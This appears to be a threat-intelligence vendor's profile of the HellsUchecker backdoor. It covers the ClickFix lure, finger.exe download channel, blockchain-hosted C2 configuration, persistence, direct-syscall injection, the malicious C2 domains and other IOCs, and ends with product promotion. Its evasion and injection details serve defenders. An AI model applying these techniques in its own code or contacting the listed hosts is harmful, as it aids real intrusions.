HellsUchecker
HellsUchecker is a native x64 backdoor delivered at the end of a 10-stage ClickFix-driven intrusion chain. Reporting describes it as a 28 KB memory-resident PE that is decrypted, decompressed, and manually loaded entirely in memory, never written to disk. Initial access uses a fake Cloudflare Turnstile CAPTCHA lure that tricks the victim into pasting an obfuscated command into Windows Run. That command abuses the Microsoft-signed LOLBin finger.exe over port 79 to retrieve batch commands, bootstrap a Python environment, and ultimately install an MSI dropper. The MSI deploys a BAT/MSBuild polyglot that reflectively loads a 6.5 MB .NET EtherHiding loader.
A notable feature of the delivery chain is EtherHiding-based C2 discovery: the .NET loader retrieves encrypted configuration data from a smart contract on BNB Smart Chain and Avalanche via the ERC20 name() call. The decrypted configuration includes C2 hosts such as https://more-arpc.icu and https://rpcsecnoweb.pro, enabling operators to rotate infrastructure through on-chain updates. The chain also includes extensive anti-analysis logic with 26 sandbox and environment checks, geofencing of 11 CIS countries including Russia, and decoy network-noise generation; the presence of C:\Nintendo reportedly bypasses these checks.
Persistence is established by copying the BAT polyglot to Windows-like cache paths as CacheManager.bat, setting Hidden/System attributes, timestomping files, creating CacheManager.lnk in the Startup folder, and using RegisterApplicationRestart. Injection uses Hell’s Gate-style direct syscalls, specifically NtCreateSection and NtMapViewOfSection, to execute shellcode without standard user-mode API calls. The shellcode decrypts the final payload with a SipHash-variant block cipher in CTR mode and decompresses it with aPLib.
The final HellsUchecker backdoor communicates over HTTPS POST to https://rec.allthe.site/chk using a JSON-RPC-like format and the User-Agent string "myApp v1.0." It fingerprints the host, can execute files retrieved from C2, and reports execution results back to the operator. Mentioned infrastructure and artifacts include h01-captcha.sbs, finger.cldvrfd.click, on.cldvrfd.click, vrf.cldvrfd.click, manager.msi (SHA256: 6373eec0482f5b98f127967135937fca60e5a497befb51cb1267fa402063095d), and the smart contract address 0x328A1faDff154290F0Ce1389a4E633698CDfdAa7. The campaign was reported active as of March 11, 2026.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
5 techniques
Execution
Persistence
2 techniques
Persistence
Privilege Escalation
3 techniques
Privilege Escalation
“It calls NtCreateSection and NtMapViewOfSection… map a read-write view for writing and a read-execute view for running the shellcode… RtlCreateUserThread targeting RX view.”
Stealth
11 techniques
Stealth
“caret escaping… base91-encoded payload… delta-encoded chunks… string encryption… XOR decrypt… SipHash-variant… aPLib compression”
“download a legitimate Python 3.14 embed package from python.org (saved with a .pdf extension to avoid download filtering)”
“It calls NtCreateSection and NtMapViewOfSection… map a read-write view for writing and a read-execute view for running the shellcode… RtlCreateUserThread targeting RX view.”
“Zeroes the process command line via Marshal.WriteInt16(GetCommandLineW(), 0, 0)… PEB command line is wiped after injection”
“The clipboard payload runs finger.exe… The malware uses it as a download channel… over the finger protocol on port 79.”
“writes manager.msi… and runs msiexec /i manager.msi… The MSI CustomAction runs explorer.exe "wscript_29ab.vbs"”
“BAT polyglot… searches for MSBuild.exe… passes itself to MSBuild… MSBuild’s inline C# task decodes… compiles the result in memory… Assembly.Load()”
“26 anti-analysis checks… RAM below 6 GB… process blacklist… queries 5 geolocation APIs… If 3 or more checks trigger, the process terminates.”
Discovery
1 technique
Discovery
Command and Control
4 techniques
Command and Control
“6 concurrent threads that generate decoy network traffic… 70% fake blockchain RPC… 30% requests to legitimate APIs… buries the real C2 communication”
“checks in… using HTTPS POST with a JSON-RPC format: {"id":,"arguments":[]}”
IOCs tracked for this family
33 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A backdoor delivered via EtherHiding that executes files retrieved from command-and-control infrastructure and reports results back.
A 28 KB native x64 backdoor delivered through ClickFix lures and a multi-stage attack chain, using HTTPS C2, BNB Smart Chain-hosted encrypted configuration, and in-memory unpacking.
Native x64, memory-resident backdoor delivered via a multi-stage ClickFix chain. Final payload is decrypted/decompressed and manually mapped entirely in memory, then beacons over HTTPS (JSON-RPC-like POST) to a hardcoded C2 and supports download-and-execute of additional payloads.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.